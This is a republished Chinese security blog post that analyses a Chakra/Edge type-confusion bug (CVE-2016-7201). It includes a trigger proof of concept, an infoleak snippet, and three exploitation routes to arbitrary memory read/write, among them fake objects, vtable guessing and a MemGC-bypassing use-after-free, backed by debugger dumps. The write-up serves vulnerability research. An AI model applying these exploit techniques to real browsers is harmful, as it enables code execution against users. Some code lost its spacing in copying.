Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

【技术分享】Three roads lead to Rome

$
0
0
【技术分享】Three roads lead to Rome

2016-11-30 10:40:46
来源:360安全卫士技术博客 阅读:404次
点赞(0)
收藏





【技术分享】Three roads lead to Rome

前言

在过去的两年里一直关注于浏览器方面的研究,主要以Fuzz为主,fuzzing在用户态的漏洞挖掘中,无论是漏洞质量还是CVE产出一直效果不错。直到一些大玩家的介入,以及大量的fuzzer在互联网公开,寻找bug需要更苛刻的思路。后来Edge中使用的MemGC使fuzz方式找漏洞更加困难,fuzz出仅有的几个能用的漏洞还总被其他人撞掉,因为大家的fuzzer是越长越像。于是今年上半年pwn2own之后开始更多的源码审计并有了些效果,起初认为存量足够了,但大概在7月份左右开始,手头的bug以每月2+的速度被撞掉(MS、ChakraCodeTeam、ZDI、Natalie、360…),本文描述的bug也是其中一个。因为这个漏洞的利用方式还是比较有趣的,经历了几次改变,值得说一下。


The Bug

varintarr=newArray(1,2,3,4,5,6,7) vararr=newArray(alert) arr.length=24 arr.__proto__=newProxy({},{getPrototypeOf:function(){returnintarr}}) arr.__proto__.reverse=Array.prototype.reverse arr.reverse()

Root Cause

出问题的代码如下:


【技术分享】Three roads lead to Rome

有很多地方都引用了这样的逻辑,javascriptArray::EntryReverse只是其中的一个触发路径。开发人员默认了Array的类型,认为传入ForEachOwnMissingArrayIndexOfObject

的prototype一定是Var Array,如下图:


【技术分享】Three roads lead to Rome

当然,通常一个Array赋值为proto时,会被默认转化成Var Array,例如:

varx={} x.__proto__=[1,2,3]

查看x的属性:

0:009>dqs0000022f`c251e920l1 0000022f`c251e92000007ffd`5b743740chakra!Js::JavascriptArray::`vftable’ 0:009>dqpoi(0000022f`c251e920+28) 0000022f`c23b40a000000003`0000000000000000`00000011 0000022f`c23b40b000000000`0000000000010000`11111111 0000022f`c23b40c000010000`2222222200010000`33333333 0000022f`c23b40d080000002`8000000280000002`80000002

但ES6中Proxy的出现使代码逻辑变得更复杂,很多假设也不见得正确了,

Proxy的原型如下


【技术分享】Three roads lead to Rome

它可以监控很多类型的事件,换句话说,可以打断一些操作过程,并处理我们自己的逻辑,返回我们自定义的数据。

其中有这样的一个handler:


【技术分享】Three roads lead to Rome

可以在prototype = prototype->GetPrototype();进入trap流程,进入我们自定义的JavaScript user callback中。

如果返回一个JavascriptNativeIntArray类型的Array,则会导致默认的假设不成立,从而出现各种问题。

其实不仅是JavascriptNativeIntArray类型,只要不是JavascriptArray类型的数组,

都会因为与期望不同而或多或少出现问题,比如

JavascriptNativeFloatArray JavascriptCopyOnAccessNativeIntArray ES5Array…

下面看看使用这种”混淆”的能力,我们能做些什么

首先重新总结下这个bug:

1.我们有两个数组,Array_A和Array_B

2.在Array_B中用Var的方式(e.GetItem())取出一个item,放入Array_A中

3.两个Array的类型可以随意指定

可以进一步转化成如下问题:

1.伪造对象:

Array_A为JavascriptArray类型

Array_B为JavascriptNativeIntArray/JavascriptNativeFloatArray等可以控制item数据

类型的数组,则

value=e.GetItem() this->SetItem(index,value,PropertyOperation_None); 操作后,在Array_A[x]中可以伪造出指向任意地址的一个Object。

2.越界读

Array_A为JavascriptArray类型

Array_B为JavascriptNativeIntArray类型

因为JavascriptNativeIntArray中元素的大小为4字节,所以通过Var的方式读取会超过Array_B的边界

为什么不在Array_A上做文章?

因为最终的赋值操作是通过SetItem完成的,即使Array_A初始化成JavascriptNativeIntArray/JavascriptNativeFloatArray等类型,最终还是会根据item的类型转换为JavascriptArray类型。


下面进入漏洞利用的部分,一个漏洞的三种利用

0x1

最初对”越界读”这个能力没有什么进一步的利用思路,而当时手头又有很多信息泄露的漏洞,于是exploit = leak + fakeObj

下面这个infoleak可以泄露任何对象的地址,当然已经被补掉了

functiontest(){ varx=[] vary={} varleakarr=newArray(1,2,3) y.__defineGetter__(“1”,function(){x[2]=leakarr;return0xdeadbeef}) x[0]=1.1 x[2]=2.2 x.__proto__=y functionleak(){ alert(arguments[2]) } leak.apply(1,x) }

要在一个固定地址处伪造对象,我们需要两个条件:

1.一个数据可控buffer的地址

2.虚表地址,也即chakra模块基址

对于1可以选择head和segment连在一起的Array

0000022f`c23b40a000007ffd`5b7433f00000022f`c2519c80 0000022f`c23b40b000000000`0000000000000000`00000005 0000022f`c23b40c000000000`000000120000022f`c23b40e0 0000022f`c23b40d00000022f`c23b40e00000022f`c233c280 0000022f`c23b40e000000012`0000000000000000`00000012 0000022f`c23b40f000000000`0000000077777777`77777777 0000022f`c23b410077777777`7777777777777777`77777777 0000022f`c23b411077777777`7777777777777777`77777777 0000022f`c23b412077777777`7777777777777777`77777777 0000022f`c23b413077777777`7777777777777777`77777777

buffer地址为leak_arr_addr+0x58,但这个方案有个限制,初始元素个数不能超过SparseArraySegmentBase::HEAD_CHUNK_SIZE

相关代码如下:

className*JavascriptArray::New(uint32length,…) if(length>SparseArraySegmentBase::HEAD_CHUNK_SIZE) { returnRecyclerNew(recycler,className,length,arrayType); } … array=RecyclerNewPlusZ(recycler,allocationPlusSize,className,length,arrayType); SparseArraySegment<unitType>*head= InitArrayAndHeadSegment<className,inlineSlots>(array,0,alignedInlineElementSlots,true);

所以在伪造对象时需要精准利用有限的空间

对于条件2,可以在1的基础上,伪造UInt64Number通过parseInt接口触发JavascriptConversion::ToString来越界读取后面的虚表,从而泄露chakra基址。

相关代码如下:

JavascriptString*JavascriptConversion::ToString(VaraValue,…) … caseTypeIds_UInt64Number: { unsigned__int64value=JavascriptUInt64Number::FromVar(aValue)->GetValue(); if(!TaggedInt::IsOverflow(value)) { returnscriptContext->GetIntegerString((uint)value); } else { returnJavascriptUInt64Number::ToString(aValue,scriptContext); } }

经过内存布局以及伪造Uint64Number,可以泄露出某个Array的vtable,如下:


【技术分享】Three roads lead to Rome

最后,通过伪造Uint32Array来实现全地址读写,需要注意的是,一个Array.Segment的可控空间有限,无法写下Uint32Array及ArrayBuffer的全部字段,但其实很多字段在AAW/AAR中不会使用,并且可以复用一些字段,实现起来没有问题。

0x2

十月,能够做信息泄露的最后几个bug被Natalie撞掉…

于是有了下面的方案,配合越界读的特性,只用这一个漏洞完成exploit.

JavaScript中的Array继承自DynamicObject,其中有个字段auxSlots,如下:

classDynamicObject:publicRecyclableObject private: Var*auxSlots; …

通常情况auxSlots为NULL,例如:

varx=[1,2,3]

对应的Array头部如下,auxSlots为0

000002e7`4c15a8b000007ffd`5b7433f0000002e7`4c14b040 000002e7`4c15a8c000000000`0000000000000000`00000005 000002e7`4c15a8d000000000`00000003000002e7`4c15a8f0 000002e7`4c15a8e0000002e7`4c15a8f0000002e7`4bf6f4c0

当使用Symbol时会激活这个字段,例如:

varx=[1,2,3] x[Symbol(‘duang’)]=4 000002e7`4c15292000007ffd`5b7433f0000002e7`4c00ecc0 000002e7`4c152930000002e7`4bfca5c000000000`00000005 000002e7`4c15294000000000`00000003000002e7`4c152960 000002e7`4c152950000002e7`4c152960000002e7`4bf6c0e0

auxSlots指向一个完全可控的Var数组

0:009>dq000002e7`4bfca5c0 000002e7`4bfca5c000010000`0000000400000000`00000000 000002e7`4bfca5d000000000`0000000000000000`00000000

基于这个数据结构,有了如下的方案:

1.布局内存,使Array连续排列,并激活auxSlots字段

2.用越界读的特性,读出下一个Array的auxSlots并存入Array_A中

3.Array_A[x]成为伪造的对象,对象数据即为auxSlots,完全可控

在没有信息泄露的情况下,伪造一个对象需要面临的问题是”指针”,比如

– 虚表

– Type * type字段

对于虚表,可以用枚举结合特定函数的方式,”猜”出vtable的值

boolJavascriptArray::IsDirectAccessArray(VaraValue) { returnRecyclableObject::Is(aValue)&& (VirtualTableInfo<JavascriptArray>::HasVirtualTable(aValue)|| VirtualTableInfo<JavascriptNativeIntArray>::HasVirtualTable(aValue)|| VirtualTableInfo<JavascriptNativeFloatArray>::HasVirtualTable(aValue)); }

在IsDirectAccessArray中会很干净的判断aValue指向的数据是否为特定的vtable,不会操作其他字段,返回结果为TRUE或FALSE。在JavascriptArray::ConcatArgs中引用了IsDirectAccessArray这个函数,并且根据它的返回结果进入不同的处理流程,最终IsDirectAccessArray的返回值可以在js层面被间接的探知到。

伪代码:

for(addr=offset_arrVtable;addr<0xffffffffffff;addr+=0x10000){ auxSlots[0]=addr if(guess()){ chakra_base=addr–offset_arrVtable break } }

下一步需要伪造Type * type这个指针字段,Type结构如下:

classType { friendclassDynamicObject; friendclassGlobalObject; friendclassScriptEngineBase; protected: TypeIdtypeId; TypeFlagMaskflags; JavascriptLibrary*javascriptLibrary; RecyclableObject*prototype; … }

其中最重要的是typeId字段,它指定了Object的类型

TypeIds_Array=28, TypeIds_ArrayFirst=TypeIds_Array, TypeIds_NativeIntArray=29, #ifENABLE_COPYONACCESS_ARRAY TypeIds_CopyOnAccessNativeIntArray=30, #endif TypeIds_NativeFloatArray=31,

因为我们已经知道了chakra的基址,所以只要在模块内找到一个数字为29的地方即可

type_addr=chakra_base+offset_value_29

最终,我们可以伪造出一个自定义的Array,进而实现AAR/AAW

0x3

目前Edge浏览器中关键的对象都是通过MemGC维护,和单纯的引用计数不同,MemGC会自动扫描对象间的依赖关系,从根本上终结了UAF类型的漏洞…

然而,真的是这样完美吗? 被MemGC保护的对象不会出现UAF吗?

有几种情况是MemGC保护不周的,其中的一种情况如下:


【技术分享】Three roads lead to Rome

如图,这是一个普通的由MemGC维护的对象,addr_A指向object的头部,addr_B指向内部中间的某个位置。


【技术分享】Three roads lead to Rome

Object2是另外一个由GC维护的对象,在其中有Object1的引用addr_A

此时,如果在js层面free掉Object1,并且触发CollectGarbage,会发现它并没有真的被释放。

然而,如果这样


【技术分享】Three roads lead to Rome

Object2中引用的是Object1.addr_B,Object1便可以被正常释放掉,从而出现一个指向Object1内部的悬挂指针。

再通过spray等占位的方法,就可以使用Object2访问freed的内容,实现UAF利用。

构造UAF的流程如下:

1.分配由MemGC维护的Object1:

0:023>dq000002e7`4bfe7de0 000002e7`4bfe7de000007ffd`5b7433f0000002e7`4bfa1380 000002e7`4bfe7df000000000`0000000000000000`00000005 000002e7`4bfe7e0000000000`00000010000002e7`4bfe7e20 000002e7`4bfe7e10000002e7`4bfe7e20000002e7`4bf6c6a0 000002e7`4bfe7e2000000010`0000000000000000`00000012 000002e7`4bfe7e3000000000`0000000077777777`77777777 000002e7`4bfe7e4077777777`7777777777777777`77777777 000002e7`4bfe7e5077777777`7777777777777777`77777777

2.分配由MemGC维护的Object2,其中有Object1+XXX位置的引用:

0:023>dq000002e7`4bfe40a0 000002e7`4bfe40a000000003`0000000000000000`00000011 000002e7`4bfe40b000000000`00000000000002e7`4c063950 000002e7`4bfe40c0000002e7`4bfe7de800010000`00000003 000002e7`4bfe40d080000002`8000000280000002`80000002 000002e7`4bfe40e080000002`8000000280000002`80000002 000002e7`4bfe40f080000002`8000000280000002`80000002 000002e7`4bfe410080000002`8000000280000002`80000002 000002e7`4bfe411080000002`8000000280000002`80000002

3.释放Object1,并且触发CollectGarbage,可以看到被链入freelist:

0:023>dq000002e7`4bfe7de0 000002e7`4bfe7de0000002e7`4bfe7d4100000000`00000000 000002e7`4bfe7df000000000`0000000000000000`00000000 000002e7`4bfe7e0000000000`0000000000000000`00000000 000002e7`4bfe7e1000000000`0000000000000000`00000000 000002e7`4bfe7e2000000000`0000000000000000`00000000 000002e7`4bfe7e3000000000`0000000000000000`00000000 000002e7`4bfe7e4000000000`0000000000000000`00000000 000002e7`4bfe7e5000000000`0000000000000000`00000000

4.使用Object2引用释放的Object1:

0:023>dq(000002e7`4bfe40a0+0x20)l1 000002e7`4bfe40c0000002e7`4bfe7de8

要把我们的bug转换成UAF,需要完成两件事情

1.找到一个对象的”内部指针”

2.将这个指针缓存,并可以通过JS层面引用

对于1,可以使用Head与Segment连在一起的Array

000002e7`4bfe7de000007ffd`5b7433f0000002e7`4bfa1380 000002e7`4bfe7df000000000`0000000000000000`00000005 000002e7`4bfe7e0000000000`00000010000002e7`4bfe7e20//指向对象内部的指针 000002e7`4bfe7e10000002e7`4bfe7e20000002e7`4bf6c6a0 000002e7`4bfe7e2000000010`0000000000000000`00000012 000002e7`4bfe7e3000000000`0000000077777777`77777777

对于2,可以通过越界读的能力,将这个指针读入我们可控的Array

现在我们造出了一个UAF,接下来用什么数据结构来填充?

NativeIntArray/NativeFloatArray显然不可以,虽然数据完全可控,但目前我们无法做到信息泄露,所以数据也不知道填什么。

最后我选择了JavaScriptArray,后面会讲为何这样选择。

最终的UAF用JavaScriptArray占位成功后效果如下:

//before free&spray

0000025d`f0296a8000007ffe`dd2b33f00000025d`f0423040 0000025d`f0296a9000000000`0000000000000000`00030005 0000025d`f0296aa000000000`000000100000025d`f0296ac0 0000025d`f0296ab00000025d`f0296ac00000025d`f021cc80 0000025d`f0296ac000000010`0000000000000000`00000012 0000025d`f0296ad000000000`0000000077777777`77777777 0000025d`f0296ae077777777`7777777777777777`77777777 0000025d`f0296af077777777`7777777777777777`77777777 0000025d`f0296b0077777777`7777777777777777`77777777 0000025d`f0296b1077777777`7777777777777777`77777777

//after free&spray

0000025d`f0296a8000000000000000110000001100000000 0000025d`f0296a9000000000000000006666666600010000 0000025d`f0296aa066666666000100006666666600010000 0000025d`f0296ab066666666000100006666666600010000 0000025d`f0296ac0>66666666000100006666666600010000 0000025d`f0296ad066666666000100006666666600010000 0000025d`f0296ae066666666000100006666666600010000 0000025d`f0296af066666666000100006666666600010000 0000025d`f0296b0066666666000100006666666600010000 0000025d`f0296b1066666666000100006666666600010000

下面说下为何用JavaScriptArray占位。

因为Var Array可以存放对象,而判断是否为对象仅仅测试48位是否为0

(((uintptr_t)aValue)>>VarTag_Shift)==0

所以对于虚表、指针等都可以当做对象以原始形态存入Var Array,这对直接伪造出一个Object来说是极好的。

具体步骤如下:

1.通过越界读,读出下一个Array的vtable、type、segment三个字段。此时我们不知道它们具体的数值是多少,是作为对象缓存的

varJavascriptNativeIntArray_segment=objarr[0] varJavascriptNativeIntArray_type=objarr[5] varJavascriptNativeIntArray_vtable=objarr[6]

2.构造UAF,并用fakeobj_vararr占位

0000025d`f0296a8000000000000000110000001100000000 0000025d`f0296a9000000000000000006666666600010000 0000025d`f0296aa066666666000100006666666600010000 0000025d`f0296ab066666666000100006666666600010000 0000025d`f0296ac0>66666666000100006666666600010000 0000025d`f0296ad066666666000100006666666600010000

3.伪造对象

之前缓存的”内部指针”JavascriptNativeIntArray_segment指向的位置,对应fakeobj_vararr第五个元素的位置,如上所示

所以:

fakeobj_vararr[5]=JavascriptNativeIntArray_vtable fakeobj_vararr[6]=JavascriptNativeIntArray_type fakeobj_vararr[7]=0 fakeobj_vararr[8]=0x00030005 fakeobj_vararr[9]=0x1234 fakeobj_vararr[10]=uint32arr fakeobj_vararr[11]=uint32arr fakeobj_vararr[12]=uint32arr

4.访问伪造的对象

alert(JavascriptNativeIntArray_segment.length)

Exploit:


【技术分享】Three roads lead to Rome

总结

本文描述了一些chakra脚本引擎中漏洞利用的技巧,分为三种不同的利用方式来体现,三种方式并不独立,可以融合成一个更精简稳定的exploit。所描述的bug最终在十一月补丁日,pwnfest前一天,同样被Natalie撞掉了,对应的信息为CVE-2016-7201,比赛最终使用的漏洞及利用方式,会在微软完成修补后讨论。

有问题,可以联系我:

Weibo:@holynop


【技术分享】Three roads lead to Rome
【技术分享】Three roads lead to Rome
本文转载自 360安全卫士技术博客
原文链接:http://blogs.360.cn/360safe/2016/11/29/three-roads-lead-to-rome/

Viewing all articles
Browse latest Browse all 12749

Latest Images

Trending Articles





Latest Images